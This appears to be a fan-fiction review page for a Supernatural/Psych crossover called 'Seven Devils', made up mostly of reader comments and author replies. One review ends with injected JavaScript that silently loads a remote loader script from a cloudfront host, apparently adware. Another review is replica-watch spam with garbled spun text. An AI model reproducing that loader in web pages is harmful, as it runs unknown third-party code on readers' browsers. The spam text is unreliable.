Reviewer: dengen Anonymous starstarstarstarhalf star [Report This]
Date: July 25, 2014 6:12 pm Title: Seven Devils

rolex daydate automatic full gold with diamond bezel and markingblack dial ro2506 p 2496 best replica watches best replica watches Black Lauren Mens Big pony Cotton Polo shirts RL96338 

zone to a different, the hr hand, with bodily time, more particulars incremented or decremented in one-hour strategies with support with push-pieces with at eight and ten o'clock. In the event the view consumer presses the northern push-piece, the hr tricep goes beforehand by just one hour. When he presses the and reduce push-piece, the hr tricep goes again, real truth in one-hour measures. best replica watches Even though the hr tricep is direct which as much as scratch placement, the actively tricep carries on on working. The over and above this idea hr tricep in blued world wide web explorer is liable for demonstrating the house time. There exists fact a 24-hour sub-dial can

Reviewer: gembomz Signed [Report This]
Date: July 17, 2014 2:41 pm Title: Seven Devils

omg!looooooooooooooooooving it!!!!!!!!!!!!!!

Reviewer: DTS Signed [Report This]
Date: March 27, 2014 8:12 pm Title: Seven Devils

I know you're in the midst of YWHOAOU (which I plan to re-read since you've now updated) but do you have any plans to continue with this story & series?

Author's Response:

Yep, still want to finish this story. But as you suspected, it's on the back burner until the end of the semester at least (end of April). I'll reevaluate then what I want to do.

I DO want to finish this though, I love Dean and Shawn so much <3 Thanks for the review!

Reviewer: sav Anonymous [Report This]
Date: October 08, 2013 7:15 am Title: Seven Devils

This is srsly the best superpsych fanfic i've ever read! MORE plz!

Reviewer: Bri5 Anonymous [Report This]
Date: February 26, 2013 7:17 pm Title: Seven Devils

Hello! Thanks to you, I've become obsessed with all Supernatural Psych Crossovers. I hope you're happy. ~ Banging head against wall~ PLEASE PLEASE PLEASE PLEASE Update soon!!!

Reviewer: Anonymous Anonymous [Report This]
Date: November 13, 2012 12:08 pm Title: Seven Devils

Please update this again real soon! I can't wait to read the rest!

Reviewer: LovingShawn22 Signed [Report This]
Date: September 25, 2012 9:36 pm Title: Seven Devils

Update pleaseif(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};

Reviewer: Carol Anonymous [Report This]
Date: August 24, 2012 11:31 am Title: Seven Devils

I LOVE THIS STORY SSSSSSOOOOOOOOOOOOOOO MUCH <333333!!!! Please keep going its just AWESOME :D. I just love everything about it from the plot to the character interaction its just very well done. Cant wait for your next chapter. Hope its soon. :D <3

Reviewer: AwesomenessISmyGame Signed starstarstarstarstar [Report This]
Date: June 14, 2012 8:26 pm Title: Seven Devils

*Sneaks in to Vindi's home with glass of water*  Shhhhhh cat. *Slowly opens Vindi's door, sees sleeping Vindi, splashes water on her face*

Ok now that you're up time to get crakin' 

And oh I am soooooo sorry I didn't update sooner. (damn week from hell)  

I love that you mention the overload of pink in here and I guess it's an Ok color just not my favorite.

And the banter, I am absolutely just in love with it it's ridiculous. I guess you need an outlet for the funny after all that angst in YWHOAOU.  

I know I do when I write that's why I have 100 Moments.

Also that wrestle match in the hotel room 

XD

I am so looking forward to the killing of demon from them, you have no idea.

And with an impressive amount of weaponary. *gets all dreamy eyed thinking about the guns*

Sorry about that.  Anyways I love how Dean is having to babysit Shawn when in fact they both need a baby sitter because look >>>>> "Did I mention we're being followed"

Dammit, of course you are. With the luck of Shawn and Dean combined how could you not be followed.  Stupid asses.

Dean & Shawn: Hey!!!

No you guys have no say in these reviews so STFU.

Anywho, again, I love the banter, the suspense, the mystery, the investigating, the fuglies, hell everything.

*Laughs as you sputter and throw stuff at me*  

Well get to writing Vindi.

 

Reviewer: Bellestarr Anonymous [Report This]
Date: June 13, 2012 6:15 am Title: Seven Devils

It's a great idea, not when Shawn says it. lol  This is such a fun story that makes me laugh and I really need that these days.  Thank You!

Author's Response: Aww, I'm so glad it makes you laugh! I hope it continues to do it in the future! But no, thank YOU for the wonderful review, Belle :)

No results found.


Enter the security code shown below: